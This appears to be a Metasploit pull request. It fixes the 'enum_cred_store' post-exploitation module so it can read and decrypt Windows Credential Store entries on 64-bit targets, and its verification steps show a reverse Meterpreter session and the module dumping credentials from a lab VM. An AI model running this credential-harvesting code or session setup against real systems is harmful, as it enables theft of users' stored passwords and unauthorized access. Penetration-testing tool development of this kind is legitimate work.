### PR TITLE
Fix #3916 Support 64 bits targets on enum_cred_store

### DIFF
--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -176,13 +176,18 @@ class Metasploit3 < Msf::Post
     adv32 = session.railgun.advapi32
     ret = adv32.CredEnumerateA(nil,0,4,4)
     p_to_arr = ret["Credentials"].unpack("V")
-    arr_len = ret["Count"] * 4 if is_86
-    arr_len = ret["Count"] * 8 unless is_86
+    if is_86
+      count = ret["Count"]
+      arr_len = count * 4
+    else
+      count = ret["Count"] & 0x00000000ffffffff
+      arr_len = count * 8
+    end
 
     #tell user what's going on
-    print_status("#{ret["Count"]} credentials found in the Credential Store")
+    print_status("#{count} credentials found in the Credential Store")
     return credentials unless arr_len > 0
-    if ret["Count"] > 0
+    if count > 0
       print_status("Decrypting each set of credentials, this may take a minute...")
 
       #read array of addresses as pointers to each structure
@@ -193,24 +198,29 @@ class Metasploit3 < Msf::Post
       #loop through the addresses and read each credential structure
       pcred_array.each do |pcred|
         cred = {}
-        raw = read_str(pcred, 52,2)
+        if is_86
+          raw = read_str(pcred, 52, 2)
+        else
+          raw = read_str(pcred, 80, 2)
+        end
+
         cred_struct = raw.unpack("VVVVQ<VVVVVVV") if is_86
         cred_struct = raw.unpack("VVQ<Q<Q<Q<Q<VVQ<Q<Q<") unless is_86
         cred["flags"] = cred_struct[0]
         cred["type"] = cred_struct[1]
-        cred["targetname"] = read_str(cred_struct[2],512, 1)
-        cred["comment"] = read_str(cred_struct[3],256, 1)
+        cred["targetname"] = read_str(cred_struct[2], 512, 1)
+        cred["comment"] = read_str(cred_struct[3], 256, 1)
         cred["lastdt"] = cred_struct[4]
         cred["persist"] = cred_struct[7]
         cred["attribcnt"] = cred_struct[8]
         cred["pattrib"] = cred_struct[9]
-        cred["targetalias"] = read_str(cred_struct[10],256, 1)
-        cred["username"] = read_str(cred_struct[11],513, 1)
+        cred["targetalias"] = read_str(cred_struct[10], 256, 1)
+        cred["username"] = read_str(cred_struct[11], 513, 1)
 
-        if cred["targetname"].include? "TERMSRV"
-          cred["password"] = read_str(cred_struct[6],cred_struct[5],0)
+        if cred["targetname"].include?('TERMSRV')
+          cred["password"] = read_str(cred_struct[6], cred_struct[5], 0)
         elsif cred["type"] == 1
-          decrypted = decrypt_blob(cred_struct[6],cred_struct[5], 1)
+          decrypted = decrypt_blob(cred_struct[6], cred_struct[5], 1)
           cred["username"] = decrypted.split(':')[0] || "No Data"
           cred["password"] = decrypted.split(':')[1] || "No Data"
         elsif cred["type"] == 4
@@ -218,6 +228,7 @@ class Metasploit3 < Msf::Post
         else
           cred["password"] = "unsupported type"
         end
+
         #only add to array if there is a target name
         unless cred["targetname"] == "Error Decrypting" or cred["password"] == "unsupported type"
           print_status("Credential sucessfully decrypted for: #{cred["targetname"]}")

--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -29,8 +29,12 @@ class Metasploit3 < Msf::Post
   #RAILGUN HELPER FUNCTIONS
   ############################
   def is_86
-    pid = session.sys.process.open.pid
-    return session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
+    if @is_86_check.nil?
+      pid = session.sys.process.open.pid
+      @is_86_check = session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
+    end
+
+    @is_86_check
   end
 
   def pack_add(data)


### PR DESCRIPTION
Looks like there is some discussion which has been going on #3916 for a long time about Pointer vs Values when dealing with railgun calls to API's like `CredEnumerateA`. Since probably the underlying issue needs some work at the railgun level, looks like it is stuck. 

So I figured out maybe worths to fix the "enum_cred_store" in the meanwhile, to allow it working on 64 bits systems. To be honest, I wasn't familiar with the module, so I just modified it to have the same behavior than in my 32bits target test.

Verification
- [x] Install a Windows 7 SP1 64 bits target
- [x] On the target go to Control Panel / User Accounts / Manage your credentials and "Add a generic credential".
- [x] Get a x64/meterpreter session on the target

```
msf post(enum_cred_store) > use exploit/multi/handler
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (1105970 bytes) to 172.16.158.131
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.131:49161) at 2015-08-10 15:25:10 -0500

meterpreter > sysinfo
Computer        : WIN-2VQC08LJCAV
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > background
[*] Backgrounding session 2...
```
- [x] Use the post/windows/gather/credentials/enum_cred_store module

```
msf exploit(handler) > use post/windows/gather/credentials/enum_cred_store
```
- [x] Run it on the new session. Verify which you get the same behavior than in a 32bits system. Verify which you don't get the error on #3916. (Note: I don't get my creds, but I bet it's because of the type of the credentials, I'm having the same result on a 32 bits system) (If someone more familiar with the module would double check, would be helpful :) )

```
msf post(enum_cred_store) > set session 2
session => 2
msf post(enum_cred_store) > run

[*] 1 credentials found in the Credential Store
[*] Decrypting each set of credentials, this may take a minute...
[*] Credential sucessfully decrypted for: test3
[+] test3
     Type: 1  User: No Data  Password: No Data

[*] Writing all data to loot...
[*] Data saved in: /Users/jvazquez/.msf4/loot/20150810152610_test_3916_172.16.158.131_credstore.user.c_658059.txt
[*] Post module execution completed
```
